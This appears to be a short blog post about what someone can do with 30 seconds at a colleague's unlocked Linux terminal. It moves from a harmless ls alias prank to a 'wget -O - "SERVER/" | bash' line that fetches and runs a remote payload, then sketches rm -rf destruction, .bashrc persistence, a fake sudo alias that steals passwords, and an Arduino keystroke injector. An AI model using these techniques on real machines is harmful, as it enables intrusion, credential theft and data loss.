Coffee Space


Office Shell Hack

Preview Image

Scenario: Your colleague running Linux has left their computer unlock with a terminal open and you have 30 seconds to play a prank, what do you do?

I was in a similar situation the other day and I thought of the following:

0001 alias ls="echo 'No files here'"
0002 clear

So this aliases the command ls to instead print that there are no files. You then want to clear the terminal to not give away the fact you wrote this.

Malicious: Of course, you could be more sneaky. I imagine returning “Permission denied”. Most people seeing this would run the command under sudom which you could detect with an whoami and then run an rm -rf.

The point is, the person does not need anything other than a terminal to cause a really bad day for you. Only a few seconds with your machine could allow them to get complete access to your machine.

More malicious: As a hacker it is much easier to automate this type of thing. A better command to run would be:

0003 wget -O - "SERVER/" | bash

Where SERVER is a short domain that is easy to type and remember.

You could then automate setting up the .bashrc file and automatically hide your payload. You could then have some rule that waits for a sudo or root command to be run that the takes advantage of this privilege in order to escalate your privileges.

How would you run as sudo? You would create your own alias of sudo, collect the user’s password, run your command and also run the sudo command with the requested arguments.

At the point at which you get root control, all security bets are off. Worse still, somebody could completely remove all traces of the command ever being run.

Ultimately, a good hacker only needs about 30 seconds at most on a terminal at your unlocked machine. To make things easier, an Arduino could be setup as a keyboard HID and run these commands in a given terminal, reducing this time to 10 seconds or less and reducing the risk of accidentally mistyping a command.